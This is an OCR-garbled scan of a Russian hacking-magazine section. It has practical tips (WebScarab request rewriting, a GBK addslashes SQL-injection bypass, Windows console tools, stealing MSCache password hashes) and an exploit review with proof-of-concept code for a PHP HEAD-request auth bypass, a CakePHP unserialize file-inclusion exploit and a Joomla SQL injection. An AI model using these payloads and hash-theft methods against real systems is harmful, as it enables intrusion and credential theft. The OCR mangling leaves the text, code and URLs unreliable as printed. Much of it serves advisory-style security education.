увидеть, чем сто раз услышать». Так что очень советую помучить ею 
что-нибудь на досуге. 

Следим за процессом. Местоположение $Ьогіси1$.хтІ 
обнаружено 
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ЗАДАЧА: ДИНАМИЧЕСКОЕ ПРИМЕНЕНИЕ 
ПРОКСИ-СЕРВЕРА. 



РЕШЕНИЕ: 

Думаю, многие согласятся, что РігеРох сейчас самый адекватный и 
распространенный браузер. Особенно он хорош своими аддонами. 
Многие из нихуже были описаны здесь, но я все равно похвалю 
такое творение как РохуРгоху. РохуРгоху — это аддон для работы 



с прокси-серверами. Основная фича, конечноже, в возможно- 
сти использовать тот ил и иной прокси-сервер в зависимости от 
того, какой сайт запрашивается. А если точнее, то на основании 
шаблонов. 

Таким образом, по обычным сайтам ползаешь просто так, а на тот, 
что «мучаешь», заходишь через прокси. Шаблоны можно зада- 
вать либо в виде регулярных выражений, либо в виде шаблонов :]. 
Примеры слишком просты, так что пропущу их. А сам аддон очень 
полезен также и для решения следующей задачи. 




ЗАДАЧА: ДИНАМИЧЕСКОЕ ИЗМЕНЕНИЕ 
НТТР(5)-ЗАПРОСОВ В ѴѴЕВ5СВАВ. 



РЕШЕНИЕ: 

Ну, начнем стого, что как-то передо мной возникла проблема 
— одна тулза не умела аутентифицироваться (Вазе64) по би р, а 
научить ее было необходимо. В решении данной задачи мне помог 
ѵѵеЬзсгаЬ. 

Я уже как-то писал о нем, но напомню. ѴѴеЬзсгаЬ — это как мини- 
мум прокси-сервер с широкими возможностями по модификации 
запросов/ответов, а как максимум — фреймворк с плагинами 
и скриптами. Взять можно у ОѴѴАЗР’а ( оѵѵазр.огд/іпсіех.рбр/ 
СаІедогѵЮѴѴАЗР ѴѴеЬВсагаЬ РгоіесД . Что приятно — ѵѵеЬзсгаЬ 
написан на яве и кроссплатформен. Минус — последние не- 
сколько лет не поддерживается. Хороший русскоязычный хелп 
поѵѵебзсгаЬ написал Кигуа — Іогит.апіісбаі.ги/збоѵѵібгеасі. 
рбр?1=1 06452 . 

Задача с аутентификацией решилась слишком просто. Прописал 
системный прокси на ѵѵеЬзсгаЬ (1 27.0.0.1 :8008, по умолчанию), так 
как в тулзе не было возможности прописать прокси, в ѵѵеЬзсгаЬ 
добавил сайт, а также логин, пароль и геаіпп (строка приветствия 
от сервера) в меню «Тооіз -> Сгесіепііаіз». Все! 

Вообще-то я надеялся, что мне удастся помучить интересную 
возможность ѵѵеЬзсгаЬ — изменение перехватываемых Ыір- 
запросов/ответов. 

Так что следующие примеры абстрактны. Для подключения 
динамического изменения запросов сначала требуется включить 
полное отображение функционала «Тооіз -> Ызег Іиіі-Іеаіигесі 
іпіегіасе», а далее перейти в «Ргоху -> Веап Збеіі». Подключа- 
ем — ЕпаЫесІ. После каждого изменения кода кликаем Соттіі. 
Понятно, что «динамику» придется писать на Веап’е. Веап Збеіі — 
это скриптовый язык на Заѵа. Никогда раньше не сталкивался, но 
оказалось все просто. Доки по языку тут — Ьеапзбеіі.огд/тапиаі/ 
Ьгбтапиаі.біті . 

Но давай лучше посмотрим на примерах: 

риЬІіс Кевропзе Те1:сбКе5роп5е(НТТРС1іеп1: пех1:Р1и§іп, 
Кеяиеві: геяиезі:) ІібгоыБ ІОЕхсерТіоп 

{ 

//Блок 1 

51:гіп§ игі = геяиезі: . §е1:ІІКІ_ ( ) . 1:о51:піп§( ) ; 

игі = игІ.герІасеСШезІірбр.ѵиІпыеЬ.сот'Д "ммм . уа . ги" ) ; 

Ы:1:риг1 = пе\ Н1:1:рІІг1(иг1) ; 

гедиезі: . ве1:ІІКІ_( 61:1: р игі) ; 



//Блок 2 

геяиезі: . сІеІеТеНеасІег ( " Ргоху -Соппесіііоп" ) ; 
гедиезі: . асІсІНеасІег ( "ТЕзІгНЕасІЕК'Д "0_о" ) ; 



//Блок 3 

гевроп5е= пех1:Р1и§іп .Те1:сбКе5роп5е(геяие5І:) ; 
Ьу1:е[] Ьу1:е5 = гевропве . §е1:Соп1:еп1:( ) ; 



ІТ (ЬуТез ! = пиіі) { 

51:гіп§ согтРепІ: = пеы 51:гіп§(Ьу1:е5) ; 

соп1:еп1: = ,, <Ы>НаскесІ Ьу СгеепОо§<Ы>"+соп1:еп1: ; 

гезропзе. 5е1:Соп1:еп1:(соп1:еп1: .§е1:Ву1:е5( ) ) ; 

} 

геТигп гевропве; 

} 

Для удобства я разбил задачку на несколько блоков. 

Итак, в блоке 1 мы заменяем запрашиваемый ЫРЬсІезІрбр. 
ѵиІпѵѵеЬ.сот на ѵѵѵѵѵѵ.ѵа.ги (думал в качестве примера обмануть 
сканнерАсипІіх’а — не получилось :) ). 

В последней строке указываем полученный II РЬ в качестве ЫРІ_ 
будущего запроса. 

Далее в блоке 2 в нашем запросе мы сначала удаляем заголовок, 
автоматически создаваемый прокси («чтобы никто не догадал- 
ся»), а далее добавляем псевдо ран домный заголовок. 

В блоке 3 сначала инициируется запрос, модифицированный 
ранее, а после к полученному ответу, в начало, добавляется 
остроумная строка. Полученный результат отправляется из прок- 
си. Результат работы ты можешь видеть на скриншоте. 

Полагаю, что описанные выше примеры дают необходимый 
минимум знаний для написания чего-то своего. Прочие возмож- 
ности для доступа к различным частям запросов/ответов тут: 
оѵѵазр.огд/іпсІех.рбр/Ноѵѵ Іо тосіііѵ ргохіесі сопѵегзаііопз . 
Остальное реализуется силами Ьеап збеіі’а. 

В качестве дополнительного совета могу предложить исполь- 
зовать последовательность проксиков-ѵѵеЬзсгаЬ’ов («Тооіз -> 
Ргохіез»), То есть получится браузер-ѵѵеЬзсгаЬ, в котором пи- 
шешь на Ьеап збеІГе < — > ѵѵеЬзсгаЬ для мониторинга результатов 
<-> сеть. 



Локальный дефэйс уапсіех'а? :) 
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ЗАДАЧА: НАУЧИТЬСЯ ГУГЛИТЬ :). 



РЕШЕНИЕ: 

Уметь гуглить, то есть быстро и точно находить верную информа- 
цию, — вещь необходимая для любого хакера в широком смысле 
этого слова. Я бы даже сказал — основная. Так что если у тебя 
проблемы с этим — учись :). Поможет тебе, во-первых, твой мозг, 
а во-вторых — знание гуглохаков. Например, тулза от достаточ- 
но знаменитой хак-группы У ЕНО — ОоодІеНаскег ( уеЬд.пеі/ІаЬ/ 
р^'зЛіІез.рЬр/доодІеЬаскег.гір І. В ней ты просто вводишь строку и 
накликиваешь необходимые параметры для поиска. Это, по сути, 
простая Ыті’ка — значит, утебя есть возможность подкоррек- 
тировать ее под себя. Плюс в ней содержится база стандартных 
гуглохаков. 




Перед тем, как задавать вопросы на форуме, спроси у 
Гугла :) 




ЗАДАЧА: ОБХОД РНР-ФУНКЦИИ АОЭ- 
51А5НЕ5 ДЛЯ ЗОЬИНЪЕКЦИЙ 



РЕШЕНИЕ: 

Наверное, ни для кого не секрет, что 50І_-инъекции — вещь 
страшная. Не зря они стоят на первом месте в топе от ОѴѴАЭР’а. 
Эта тема поднималась на страницах ][ не раз, затрону и я ее (хотя 
и немного косвенно). 

РНР и Му8СН_ — это самая распространенная сейчас связка 
при разработке ѵѵеЬ- ресурсов. Важный момент в безопасно- 
сти — конечноже, фильтрация пользовательского ввода в РНР 
перед передачей строки запроса в Му50І_. По опыту общения с 
веб-девелоперами могу сказать, что очень немногие из них раз- 
бираются во всевозможных 5СН_-инъекциях и их подвидах. Чаще 
всего пользуются какой-нибудь функцией и все. Либо тузд[_геаІ_ 
езсаре_з1;гіпд (как вариант — без геаі), либо асИзІазбез. Второй, 
конечно, реже, но все же пользуются. 

Для справки: асІсІзІазЬез добавляет экранирующий символ (то 
есть слэш «/») перед символами одинарных (0x27) и двойных 
(0x22) кавычек, бэкслэшем (0x5с) и перед пиіі-байтом (0x00). Та- 
ким образом, данное экранирование лишает взломщика возмож- 
ности провести инъекцию. 

Нов определенных ситуациях мы можем обойти эту функцию. В 
каких? Когда при взаимодействии с базой данных используются 
мультибайтовые кодировки — 5Л5, В 1 05 , 6ВК, СР932. Возможны 
и другие, но точно не УТР. Могут быть дополнительные ограниче- 



ния в виде Му50І_4.1 .х-4.1 .20, 5. 0.x- 5. 0.22 и РНР <5. 2. 5 
Как видишь, спектр возможных целей сужается, но все же стоит 
об этом помнить, особенно «работая» с иностранными сайтами. 
Но посмотрим, в чем же суть уязвимости. Для кодировки 6 В К, 
например, 0хЬб27 — неправильная последовательность, такого 
символа нет. В то же время символ ОхЫЛс — есть. Теперь посмо- 
трим на работу функции асІсІзІазЬезіОна берет по одному байту 
и экранирует его, если необходимо. ОхЫ" — это «1», 0x27 — это 
кавычка, ее экранируем. 

На выходе получается 0хЫ : 5с27 (1\‘), но в Му5СН_ воспринимается 
два символа — ОхЫЛс и 0x27, то есть «что-то» и кавычка. 
50І_-инъекция в простейшем виде будеттакой: 

И11р://1:е5І:.сот/Ѵи1п.рбр?і(1=%Ь-р%27 (Ж 1=1 /* 

К описанному выше можно добавить, что и с тузд[_езсаре_5І:гіпд 
могут быть похожие проблемы, хотя и в очень специфических 
ситуациях. Подробнее читай в следующих постах: 

• 5ІііПе1:1 . ог§/Ыо§/2006/дап/асІсІ5Іа5Ііе5-ѵег Бив- тузді- геаі - 
е5саре-5І:гіп§; 

• іііа .ыз/агсІііѵе5/103-ту5д1_геа1_е5саре_5І:гіп§-ѵег5и5- 
РгерагесІ-51:а1:етеп1:5 . ІгЬтІ; 

• кига55. Ыо§вро1:. сот/2007/Ѳ6/ту5д1-іпдес1;іоп-епсосІіп§- 
аііаскз . ІтЬтІ; 

• па20п.пате/ѵи1пегаЬі1і1:іе5/5д1-іпексіі-5ѵуа2аппуе-5- 
тиІІііЬадЧоѵуті-косІігоѵкаті-і-асІсІзІазІіез . 




ЗАДАЧА: МОДИФИЦИРОВАТЬ 
СТАНДАРТНЫЙ ѴѴІЫРОѴѴ5-ШЕЛЛ. 



Приведу пару примеров, остальное можно почерпнуть либо тут: 
ѵѵі псІоѵѵзТад . ги/соп1:еп1:/ѵіеѵѵ/203/ 1 . либо на официальном сайте 
МісгозоД. 



РЕШЕНИЕ: 

Вообще следующий материал будет полезен как для боевых усло- 
вий при взломе ѵѵіп- систем, та к и в нормальной жизни. 
Повторюсь, что виндовая консоль (так называемый сппсі.ехе) — та 
еще хреновина: отсутствует куча обыкновенных для шеллов воз- 
можностей, да еще и команды многие называются не как в піх’ах. 
Но с ней все же приходится работать. Что бы хоть как-то испра- 
вить положение, мы можем воспользоваться стандартной тулзой 
сіозкеу. Это некое подобие команды аііаз под никсами. йозкеу 
позволяет работать с хистори консоли и создавать/редактировать 
макросы как для консоли, так и для стороннего ПО. Что приятно — 
она есть во всех версиях ѴѴіпсІоѵѵз. 



1. йозкеу /бІ5І:огу 

2. йозкеу І5=сІіг $* 

3. йозкеу /ехепате=-Р1:р. ехе §о=ореп 192.168.2.101$1:т§е1: *.ТХТ 
с : \герог1:5$Ьуе 

Пояснение по пунктам: 

1 . Выводим список последних команд. 

2 . Создадим алиаснасіігс более знакомым именем и передачей 
параметров (за это отвечает $*). 

3. Создаем макрос для 11р. ехе. Теперь, после введения команды до 
в Ир, сначала произойдет кон не кт к 1 92.1 68.2.1 01 , далее скачаются 
все текстовые файлы и произойдет выход. Здесь $1: — это раздели- 
тель в последовательности команд (ореп, тдеі, Ьуе). К сожалению, 
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чтобы сохранить макросы, между сессиями требуется использовать 
файлик и подгружать его при каждом старте нового стсі.ехе. 

1 . Сохраняем так: 

сіозкеу /тасгоз > зісітасз 

2. Подгружаем так: 
сіозкеу /тасго61е=з1:сІтас5 

Как видишь, возможность подстройки консоли под себя существу- 
ет. В качестве небольшого личного открытия: юзая клавишу Р7/Р9, 
можно выбрать одну из последних команд. 

Ріо это все мелочи. По-настоящему интересная штука нашлась на 
сайте ЫігБоН’а. Там, конечно, много всего полезного, но это что-то 
совсем полезное :). Я говорю про консоль от ЫігзоіТ’а — пігсппсіс. 
Качаем и читаем описание здесь: пігзоІ'Тпеі/иІІІз/пігсппсІ.ЫппІ . Сра- 
зуже скажу, что более полное описание функционала (а без него и 
не справишься) лежит в хелпе ктулзе. 

Если в двух словах, то эта тулза размером всего в 34 Кб позволя- 
ет почти полностью эмулировать действия пользователя за его 
компьютером, дает возможность взаимодействовать, наверное, со 
всеми частями ОС, будьто файловая система, реестр или устрой- 
ства. Вещица эта, безусловно, пригодится и в повседневности, и 
при взломе. В последнем случае я вижу ее применение как за мену 
каким-то специфическим скриптам для теіегргеіег’а, то есть ког- 
да стандартных возможностей не хватает, а скрипт писать лень. 
Тулза и правда полна возможностей, так что приведу парочку 
общих приме ров. Думаю, ограничением тут может быть лишь твоя 
фантазия (см. скриншот). 

1 . Меняем громкость на максимум: 

пігстсі.ехе зеізузѵоіите 65535 

2. Выводим в трее страшную надпись (см. скриншот): 

пігстсіс.ехе ігауЬаІІооп "Ѵо тап!" "Ѵои аге ромпесМ" \ 

"збе1132. 611,-15" 1ѲѲѲѲ 

3. Помещаем консоль «поверх всех окон» и делаем ее прозрачной: 

пігстсі.ехе міп зеііортозі: ііііе \ 



"С : \ІлІіпсІоы5\5у5І:ет32\стсІ . ехе" 1 
пігстсі.ехе міп ігапз ііііе \ 

"С : \ІлІіпсІоы5\5у5І:ет32\стсІ . ехе" 100 

4. Запрашиваем пользователя о перезагрузке и перезагружаемся 
при положительном ответе: 

пігстсі.ехе дЬохсот "йо уои іл/апі іо геЬооі?" \ 

"диезііоп" ехііміп геЬооі 

Хочу также добавить, что многие функции работают и без админ - 
ских привилегий, к тому же есть возможность работать удаленно. 




Результат работы пігстсі.ехе 





ЗАДАЧА: КРАДЕМ М5СА5Н-ХЭШИ ИЗ 
ВИНДЫ 



РЕШЕНИЕ: 

Отом, что это, и каких красть, я писал пару номеров назад, но все 
равно пройдусь еще раз по общей инфе. В ѵѵіпсІоѵѵБ-системах есть 
функция хранения последних 10 аутентификационных данных, то 
есть 1 0 последнихзаходов пользователей. Так называемый «кэш 
входов». Это необходимо для того, чтобы можно было логиниться 
доменным пользователям, когда отсутствует связь с контроллером 
домена, например. Какты понимаешь, это лакомый кусочекдля нас. 
Если мы получаем доступ к этому кэшу, мы сможем пробрутить пароли 
кучетным записям. Еще замечу, что в кэше хранятся не ІМИМ-хэши, 
как в ЗАМ или І_5А, а МЗСасбе-хэши. Поправлюсь по сравнению с 
прошлым описанием МЗСасбе. Они бывают двух видов. 

Старый ѴѴі псіоѵѵз 2000-2003: 



МазМ = Мй4 ( МР4(изег раззмогсі) + 1омегсазе(изег пате) ) 



Новый М5Сасбе2 в ОС, начиная с Ѵізіа: 

ТіазТі = РВК0Р2_5НА( Мй4 (М04(изег раззыогсі) + 
1оіл/егсазе(изегпате) ) , ііегаііопз ) 

Где ііегаііопз по стандарту равно 1 0240. 

Более подробно можешь прочитать тут: ра55саре.сот/іпсІех.рЬр?5е 
сбоп=бос5Ѵ5&сітіб=беІаі[5&іб=8 . 

Вне зависимости от алгоритма и МЗСасбе, и М5Сасбе2 переби- 
раются, используя, например, щбп Ібе гіррег с щтЬо-па ком. Хотя 
второй, конечно, медленнее. 

Вот та к плавно мы подошли к причине «повтора уже пройденного 
материала». В прошлый раз я писал, что мы можем заполучить 
кэши хэшей, используя тулзу [дб и тр. Ее главный косяк был в том, 
что о ней «все знают», и она палится большинством антивирсов. 
Обход последних — дело, конечно, не трудное. Но закачивать тул- 
зу каждому поовненному пользователю не методично. Методично 
— это скрипт для ппеіегргеіег. Но таких не было, пока Маурицио 
Агаццини из тебіазегѵісе.пеі не написал его. Расхватываем и 
радуемся: ІаЬ.тебіазегѵісе.пеі/собе/сасЬебитр.гЬ . т 
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взлом 



I Маг (ісд 884888, зпіррег.ги) 






1 ЕХРЮІТ 
КЕѴІЕѴѴ 


5 




1 ЕХРЮІТ5 
КЕѴІЕѴѴ 


1 



ОБЗОР . 

эксплоита 





Разбираем 

свежие 

уязвимости 




ЕХРЮІТ5 

КЕѴІЕѴѴ 



РГ _ 
ЛЕѴѴ 



В текущем месяце багокопатели не хотят нас баловать новыми 
громкими эксплойтами в популярных приложениях. Конечно, опу- 
бликовано множество абѵізогу в продуктах известных фирм, но 
очень малое их количество содержит удобоваримые РоС-коды. В 
нашем обзоре я постарался собрать самые значимые и полные 
уязвимости из описанных в последнее время, так что устраивайся 
поудобнее и наслаждайся чтением. 




УЯЗВИМОСТЬ РНР ПРИ ОБРАБОТКЕ 
НИР НЕДР-ЗАПРОСОВ 



2епсІ_Ьаі1ои1:(); 

} 



мана 

3 марта некий Адам Иванюкобнаружил интересную особенность в 
интерпретаторе РНР, который не совсем корректно обрабатывает 
НЕАР-запросы. Данную уязвимость исследователь назвал «НТТР НЕАР 
теібоб Ігіск іп рЬр зсгіріз». 

Многие кодеры разрабатываютсвои РНР-скрипты, надеясь, что все 
записанные в них инструкции успешно выполнятся, не прервавшись 
где-нибудь посередине (особенно в коротких скриптах). Так и проис- 
ходит, если скриптзапрашивается конечным пользователем с помощью 
методов СЕТ, РОСТ, РІІТ. 

Но тебе должно быть известно, что существуют и другие НТТР-методы 
— например, НЕАР. Как раз-таки при обработке этого метода в РНР и 
может возникнуть дыра в безопасности. 

Смотрим один из исходников интерпретатора: ./таіп/ЗАРІ.с, линия 31 5: 

(5С(і^ие5І:_іп-Ро) . геяие5І:_те1:ІіосІ && 

! 5І:гстр(5С(гедие5І:_іп-Ро) . і^ие5І:_те1:ІіосІ , "НЕАР" ) ) 

{ 

5е(геяие5І:_іп-Ро) .ІіеасІег5_оп1у = 1 ; 

Когда поступают какие-либо данные, выполняется функция рбр_иЬ_ 
Ьобу_\л/гі1;е. 

Дальше смотрим таіп/оиіриі.с, линия 699: 

(5С(геяие5І:_іп-Ро) .ІіеасІег5_оп1у) { 
і-р(5С(ІіеасІег5_5еп1:)) 

{ 

геТигп 0; 

} 

рІір_ІіеасІег(Т5КМІ_5_С); 



Здесь видно, что при первом выводе на экран и при использовании 
метода НЕАР функция гепсЦэаіІоиІ прерываетработу скрипта. 



.ОН 



Автор приводит несколько примеров эксплуатации этого бага. 

В первом примереу насесть простая гостевая книга, похожая на мно- 
жество скриптов, которые были когда-то разработаны и выложены в 
Сеть: 

< ?рМр 

$1іпе= 'ІМіск: ' . Іі1:тІ5ресіа1сбаг5 
($_Р05Т[ 1 піск' ] ) . ' <Ьг /> 

Техі:: ' .Іі1:тІ5ресіа1сІіаг5 
($_Р05Т[ЧехГ ]). ЧИг />'; 

$-р=-Рореп ( " Ьоок . 1:х1: " , " г " ) ; 

$сІа1:а=-РпеасІ ($-Р^1е5І2е ( " Ьоок . Ііхі: " ) ) ; 

-РсІ05е($-Р); 

$-р=-Рореп ( " Ьоок . 1:х1: " ,Ѵ ) ; 

$сІа1:а=$1іпе.$сІа1:а; 
есбо $сІа1:а; 

■Рыг11:е($-Р^$с1а1:а); 

-РсІ05е($-Р); 

?> 

Теперьдавай обратимся к этому скрипту с помощью метода НЕАР: 

< ?рМр 

5І:геат_соп1:ех1:_§е1:_сІе-Раи11: 

(аггау( ' Ы:1:р ' =>атау ( , те1:I^осГ=> ,, НЕА^ ,, ))); 
ргіп1:_г(§е1:_ІіеасІег5 ( ' Ы:1:р : //5І1:е . сот/§ие5І:Ьоок . рбр ' ) ) ; 

?> 
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ЕХРЮІТ8 

РП/ІПМ 






г ■ г: і . 




ЕХРЮІТ5 

РЕѴІЕѴѴ 





Аггау 

{ 






ЕХРЮІТ8 




РЕѴІЕѴѴ 




[0] = У НТТР/1.1 200 ОК 

[1] -> Расе: Цел, 23 Нас 2011 23:52:26 ОКТ 

[2] => 8есѵ«: АрасЬе/2 , 2 . 4 №ШЪ) «юЛ_азА/2 , 2 . 4 0ре*тъ/0.9.3е РНР/ 5 ,2. 4 

[3] "> Х^Роиегей-Ву: РНР/ 5. 2.4 

[4] “> Соппессіоп: еіозе 

[5] => Сопсепс-Туре : сехс/йіті; сЬаг5ес=»іпЛомз-і25і 






Посылаем НЕАЭ-запрос к уязвимой гостевой книге 

НТТР НЕАО тсекні ігіек Іп ріір всгіріа 

Как и следовало ожидать, наша гостевая книга остановит свое 
выполнение на строчке «есЬо $с!аІа;», таким образом файл Ьоок.іхі 



{ТнЛяі ш ріір ѵсгеіоп 5.3.5) 



просто-напросто обнулится. 

Данный пример носитскорее деструктивный характер. Во втором 
примере мы сможем обойти авторизацию в примитивной админке: 



Ліішіі Івдшнк 
МаігЬ 3, Ш\ 



< ?рИр 

5е55Іоп_5І:агі:(); 

есбо 'А 1оп§ 5І:гіп§ сопІіаіпБ аЬоиІ: 4090 сбагас1:ег5 ' ; 

$_5Е55І0І\І[ ' асітіп ' ]=1; 

І"Р ( ! І55ѲѢ ($_Р05Т [ ' рЭ55 ' ] ) || 

$_Р05Т[ ' рав5 ' ] ! = ' 5отера55ыогсІ ' ) 

{ 

есбо '<Ь>ІлІгоп§ ог етр1:у раззіл/огсі .</ЬхЬг> ' ; 
$_5Е55І0І\І[ ' асІтіп_1еѵе1 ' ]=0; 

} 



?> 

В этом скрипте при заходе обычными методами устанавливается 
административная переменная в сессии. Затем, если пользова- 
тель ввел неправильный пароль, эта переменная обнуляется и 
пользователь не становится админом. 

Если мы обратимся кадминке через НЕАО, ее выполнение пре- 
рвется на куске кода с «есбо», таким образом административная 
переменная не обнулится, и мы сможем спокойно бродить по за- 
крытой части приложения. Здесь надо учесть, что в большинстве 
веб-серверов значение буферизации вывода установлено равным 
4096 байт, так что в рабочем примере нам может понадобиться 
строка 'А Іопд зігіпд сопіаіпз аЬоиІ 4090 сбагасіегз'. 

ДОііЫН 

РНР <= 5.3.5 



50ШТІ0Ы 



На момент публикации обзора последней версией РНРявлялась версия 
5.3.5. В ней нетникакихисправлений, касающихся данного бага, так что 
могулишь посоветовать внимательно просмотреть исходники своих 
скриптов на предметнепредвиденных ситуаций при использовании 
метода НЕАР. 




ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО 
КОДА В САКЕРНР 



ШТ?з 

Саке РНР — это известнейший (более 7 000 000 упоминаний в 
Гугле] программный каркасдля создания веб-приложений, напи- 
санный наязыкеРНРи построенный на принципах открытого ПО. 
Саке РНР реализует паттерн «Модель- В ид- Контроллер» (МѴС). 
Изначально данный фреймворк создавался в качестве клона по- 



ТЫ> ап ІсЬ і* йЛяш ІюЬдгіог иі рЬц хгідо щч-іьпі к Ьнр ІІК.Ш икіЫ, 

Л 1*«е «діин ІІнР 1ІИ-ІГ мгірт» іИчч'і 1-- ІННГПфС^І лгмі мгЦ1 ПИ: № 

іЬг пѵі кч ікгірі^. \ѴІки НЕЛО пиіікні п ііміі. ріір угпрі 

*кі іЬг ИМ «<|(|МЦ *ІМ гщЪ «-И4ІІІД іі-рі™. 

рЪр-4.3.ЗДакІіЛйАР1.С 1Ь» 31 Ъ- 

и сксгі^имг.іліс-? .гіфіи-въ.ыім и 

і ’Ш')) ( 

■ 1: 

і і ивдіод рЬр.иЬ_Ь^ .-рігііі ѵЫсЬ іѵ ѵЬгів 

-нкрці №1 ІХТІѴ4СЛ 

и ск [пф*п.иібЭ , ьийігѵ-иіу) { 
іІШМѵпимлЛ І 

г*^ѵв 0: 

Рйр-Ь«ьд3гг (Т9ЯШЭ-.0 ; 

Оригинальное асіѵізогу об уязвимости НЕАО-запросов в 
РНР 

пулярного РиЬу оп Раііз, многие идеи были заимствованы именно 
оттуда : 

• Своя файловая структура; 

• поддержка множества плагинов; 

• абстракция данных (РЕАК: :0В., АООсІЬ и собственная разработка 
Саке); 

• поддержка множества СУБД (Ров1:§ге50)І_., Му5(2І_., 5(2І_і1:е, Огасіе) . 

Неудивительно, что на столь примечательный программный продукт 
обращено пристальное внимание многих пентестеров. Нетакдавно 
человек под ником беііх нашел в данном фреймворке интересный 
баг, связанный с волшебными методами и использованием функции 
и пзегіа Ііге (подробнее о данном классе уязвимостей читай в прошло- 
годних номерахжурнала). 

Для начала открываем компонент ./ІіЬз/сопІхоІІег/сотропепіз/ 
зесигііу.рбр и ищем следующий код, отвечающий за защиту от Х5РЕ- 
ата к с помощью Р05Т-запросов: 

< РрЕір 

-РипсЕіоп _ѵа1ісІа1:еРо5І:(&$соп1;по11ег) 

{ 

$сбеск = $соп1:го11ег->сІа1:а; 

$1:океп = иг1сІесосІе($сІіеск[ '_Токеп' ] [ 'беІсІБ ' ]); 
і-р ( Багров ($1:океп,, ':')){ 

1І5І:($1:океп ,, $1оскесІ) = ехр1осІе( ' : ' , $1:океп., 2); 

} 

$1оскесІ = ип5епіа1І2е(5І:п_го1:13($1оскесІ)); 

?> 
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Эксплойт для СакеРНР 





Сотое* в 

1Ш шт . 




Одна из СМ5, основанных на СакеРНР 



а также используется для подгрузки дополнительных классов во 
время выполнения скрипта. 

Реальный код для загрузки классов выглядит немного сложнее, новее 
это сводится к следующему коду из метода ІоасІ внутри класса Арр: 

< РрМр 

і-р (Рі1е_ехІ5І:5($Рі1е)) { 
і-р ( !$1:ІіІ5->ге1;игп) { 
геяиіге($Рі1е) ; 



Здесь массив $сЬеск содержит наши РОБТ-данные, а переменная 
$ІоскесІ — это обфусцированная с помощью функции 5Іг_го113() 
сериализованная строка, которая полностью находится под нашим 
контролем. 

На этом месте стоит сделать небольшое отступление для тех, кто не 
читал соответствующие статьи в ][, и кратко рассказать о баге, про- 
являющемся в волшебных методах РНР 
Итак, в РНР версии 5 появилась базовая концепция ООП - 
программирования: конструктор и деструктор. Конструктор реали- 
зуется с помощью метода « сопзігисі», а деструктор — с помощью 

метода « сіезігисі:». По окончании своей работы и при вызове через 

функцию ип5егіаІІ2е() каждый объект выполняетсвой собственный 

безігисі-метод, если он прописан в коде. Амы тем временем можем 
использовать эту особенность РНР, если отсутствуют какие-либо про- 
верки пользовательского ввода в функции ипзегіаііге (оригинальное 
абѵізогу Стефана Эссера читай по ссылке зизрекі.огд/сіоѵѵпіоасіз/ 
РОС2009-5ЬоскіпдМ еѵѵзі п РН РЕхрІоіІаІіо п . рсіб ) - 
Теперь вернемся к нашему фреймворку и посмотрим на деструктор 
Арр-класса из файла ./ІіЬз/сопбдиге.рбр: 



$1:ІіІ5-> 1оасІесІ[$1й1е] = 1:гие; 

} 

геТигп 1:гие; 

?> 

Бинго! Путем подмены переменной $Р1е мы сможем проинклудить 
свой собственный РНР- код! Причем это будет самый настоящий 
Реппоіе Рііе Іпсіизіоп баг — таким образом, нам не понадобят- 
ся никакие дополнительные ухищрения с загрузкой локальных 
файлов на сервер. Однако автор найденной уязвимости предла- 
гает І_РІ- вариант эксплуатации этой дырки, потому что СакеРНР 
использует базирующийся на файлах локальный кэш, который 
находится в сериализированной форме в известной взломщику 
директории. 



ЕХРЮІТ 



В качестве небольшого РоС для генерации ядовитой сериализованной 
строки беііх предлагает следующий код: 



-Рипсіііоп сіезі: гисі: ( ) 

{ 

( $1:ИІ5 - > сасбе) 

{ 

$соге = Арр : : соге( ' саке 1 ) ; 

ипзе1:($1:ІіІ5- > ра1:Іі5[г1:піт($сопе[0] , й5) ] ) ; 

Сасбе : :ыгі1:е( ' сІіг_тар 1 , аггау_1і11:ег($1:ІіІ5-> ра1:И 5 ) , 

'_саке_сопе_' ) ; 

Сасбе : :ыгі1:е( Чі1е_тар ' , агпау_1і11:ег($1:ІіІ5-> тар) , 

'_саке_соге_' ) ; 

Сасбе : :ыгі1:е( 1 оЬдес1:_тар ' , $-ЫіІ5- > оЬдес1:5., 

'_саке_соге_' ) ; 

} 

} 

Из приведенного кода можно понять, что данный метод может 
быть скомпрометирован путем записи произвольных значений в 
объект Сасбе. 

Наиболее интересный ключ для взлома — это ‘Р1е_тар’. Он управ- 
ляет связями между классами и соответствующими РНР-файлами, 



< РрМр 

$х=іеѵ\і Арр(); 

$х-> сасІіе=1; 

$х-> тар=аггау("Соге" => аггау( 

"Коиііег" => " . ./Іітр/сасІіе/репзІБІіепІі/саке^опе^Іе^ар") , 
"Роо" => "<? рбріггРо(); ехі1:(); ?>"); 

$х- > ра1:Іі5=аггау ( ) ; 

$х-> оЬдес1:5= гау(); 

есбо 5егіа1ііе($х); 

?> 

Конечно, предварительно ты должен проинклудить необходимые клас- 
сы из СакеРНР. 

Существует также и полнофункциональный эксплойт на Питоне, найти 
который ты сможешь по адресу та Нос. Іт/Ьи теска ке.ру . 

Данный сплойт должен работать в каждом приложении, построенном на 
СакеРНР, использующем РОБТ-формы сзесигііу-токенами, и в котором 
не изменено стандартное расположение файлов кэша. По дефолту экс- 
плойт выводит на экран конфигбазы данных, другие полезности легко 
добавляются путем измененения встроенного РНР-пэйлоада. 



► 048 
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три * к — мчнниліміініпнтмві 

щ -Юоппіа ! 






ЕХРЮІТЗ 




КЕѴІЕѴѴ 




иоотіа 1.6.1 КеІеавесІ 

№мг.Ѵі» І*і« 




т&ѣіт* М49НІ !амЦмп*И I д*.Н*иМ 

ОіЛП«г« ефй«гп1овс1 *мч*іі І'Л Г І №отккркЦ)еі] . 



Выход зесигНу-релиза .Іоотіа! 1.6.1 



Раскрытие путей и потенциальная 501-инъекция в 
.Іоотіа! 



ТАК6ЕТ5 



СакеРНР <= 1 .3.5, СакеРНР <= 1 .2.8 



50ШТІ0Ы 



Для исправления описаннойуязвимости необходимо всеголишь 
скачать последнюю версию используемой тобой ветки СакеРНР с сайта 
производителя сакербр.огд . 



РАСКРЫТИЕ ПУТЕЙ И ПОТЕН- 
ЦИАЛЬНЫЕ ЗОЬИНЪЕКЦИИ В 
ЗООМЬА! 



' РВОМ # ыеЫіпкв' . 

' ІлІНЕКЕ саТісІ = (іітЬ) $1:ІіІ5->_ісІ . 

1 АШ риЬІізІіесІ = 1 ' . 

' АШ агсбіѵесі = 0' . 

' ОКРЕК ВУ ' . $1і11:ег_опсІег . ' ' . 

$Ті11;ег_огсІег_сІіг . ' огсіегіп^'; 

геТипп $диегу; 

} 

Здесь видно, что переменные $Шег_огсІег и $бИ;ег_огбег_біг не про- 
